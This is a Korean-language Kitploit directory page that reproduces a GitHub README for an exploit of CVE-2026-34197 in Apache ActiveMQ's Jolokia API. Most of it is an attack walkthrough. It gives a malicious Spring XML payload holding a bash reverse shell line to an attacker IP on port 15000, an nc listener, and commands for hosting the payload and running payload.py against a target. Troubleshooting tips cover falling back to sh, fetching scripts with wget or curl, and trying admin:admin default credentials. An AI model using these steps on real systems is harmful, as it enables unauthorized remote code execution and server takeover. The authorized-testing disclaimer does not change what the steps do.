Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-34197-payload-Apache-ActiveMQ- — CVE-2026-34197용 익스플로잇 스크립트로, Apache ActiveMQ의 Jolokia API를 대상으로 악성 Spring XML 구성을 통해 원격 코드 실행을 달성하며, 리버스 셸 기능을 포함합니다. | Kitploit
도구/GitHubGitHub/xshysjhq/cve-2026-34197-payload-apache-activemq-
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubxshysjhq/cve-2026-34197-payload-apache-activemq-

CVE-2026-34197-payload-Apache-ActiveMQ-

CVE-2026-34197용 익스플로잇 스크립트로, Apache ActiveMQ의 Jolokia API를 대상으로 악성 Spring XML 구성을 통해 원격 코드 실행을 달성하며, 리버스 셸 기능을 포함합니다.

저장소 보기
174개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ActiveMQ Jolokia RCE 취약점 재현 가이드

이 저장소는 Apache ActiveMQ에 노출된 Jolokia API 인터페이스(/api/jolokia/)를 기반으로 한 원격 코드 실행(RCE) 취약점 재현 환경과 공격 스크립트를 제공합니다. addNetworkConnector 작업을 호출하여 ActiveMQ가 악의적으로 구성된 원격 Spring XML 설정 파일을 강제로 파싱하도록 하여 MethodInvokingFactoryBean을 통해 시스템 명령을 실행합니다.

📁 포함 파일

  • payload.py: 동적 Broker 이름을 포함한 HTTP POST 요청을 전송하는 주요 공격 스크립트.
  • payload.xml: 리버스 셸 명령 페이로드가 포함된 악성 Spring Bean 설정 파일.

🛠️ 환경 준비

  1. Python 3 환경
  2. 의존성 설치:
    root@kitploit:~
    pip install requests
    
  3. 공격 머신(예: 클라우드 서버): 공인 IP가 필요하며, HTTP 서비스 포트와 리버스 셸 수신 포트를 개방할 수 있어야 합니다.
  • 대상 머신: 취약점이 존재하는 ActiveMQ 서비스(예: apache/activemq-classic:6.1.0 Docker 이미지).
  • 🚀 재현 단계

    1. 공격 페이로드 구성 (payload.xml)

    공격 머신에서 payload.xml을 열고 다음 부분을 찾습니다:

    root@kitploit:~
    <value>bash -c 'bash -i >& /dev/tcp/您的云服务器IP/15000 0>&1'</value>
    

    해당 IP를 클라우드 서버의 공인 IP로 변경합니다. 대상 환경에 bash가 없는 경우, 대상 환경에 맞게 sh 또는 다른 실행 방식으로 변경합니다.

    2. 리버스 셸 수신 대기

    공격 머신(클라우드 서버)에서 터미널을 열고 지정된 포트(예: 15000)를 수신 대기합니다:

    root@kitploit:~
    nc -lvvp 15000
    

    참고: 클라우드 서버의 보안 그룹/방화벽에서 인바운드 TCP 15000 포트를 허용했는지 확인하세요.

    3. HTTP 서비스로 페이로드 호스팅

    공격 머신에서(payload.xml과 같은 디렉터리), 대상이 XML 파일을 다운로드할 수 있도록 HTTP 서버를 실행합니다:

    root@kitploit:~
    python3 -m http.server 9000
    

    참고: 마찬가지로 클라우드 서버의 보안 그룹/방화벽에서 인바운드 TCP 9000 포트를 허용했는지 확인하세요.

    4. 취약점 공격 스크립트 실행

    로컬 머신(또는 공격 머신)에서 payload.py를 실행합니다. 스크립트는 명령줄 인자를 통해 대상 ActiveMQ의 IP:포트(-t)와 공격 머신이 XML을 호스팅하는 IP:포트(-a)를 전달받습니다.

    root@kitploit:~
    python payload.py -t 192.168.0.1:8161 -a 8.8.8.8:9000
    

    실행 후, 스크립트는 java.io.IOException : Network Connector could not be registered in JMX 이름 충돌 오류를 완전히 해결하기 위해 임의의 brokerName(예: rce_a1b2c3)을 자동으로 생성합니다.

    5. 셸 획득

    공격이 성공하면:

    1. HTTP 서버(python3 -m http.server 9000)에서 /payload.xml에 대한 GET 200 요청 기록이 표시됩니다.
    2. nc 수신 터미널에서 대상 머신으로부터의 리버스 셸 연결을 수신합니다.

    ⚠️ 일반적인 문제 해결

    1. XML 획득 성공(HTTP 200)했지만 셸을 받지 못한 경우:
      • 원인 A: 클라우드 서버 보안 그룹이 리버스 셸을 차단했습니다(인바운드 15000 포트 미허용).
      • 원인 B: 대상 컨테이너에 /bin/bash 명령이 없습니다(Alpine 등 경량 기본 이미지에서 흔함). payload.xml의 실행 명령을 /bin/sh로 변경하거나 wget/curl로 스크립트를 내려받아 실행하세요.
    2. 대상에서 401 Unauthorized 오류 발생:
    • 원인: 상위 버전의 ActiveMQ / Jolokia 인터페이스는 계정 비밀번호 인증을 요구합니다.
    • 해결: 기본 자격 증명인 경우 요청에 Basic Auth(예: admin:admin)를 추가합니다.

    🛡️ 면책 조항

    이 스크립트와 설명은 승인된 보안 테스트 및 교육 목적으로만 사용됩니다. 승인되지 않은 불법 테스트에 사용하는 것을 엄격히 금지합니다. 사용자는 자신의 행동에 대한 책임을 져야 합니다.

    도구 다운로드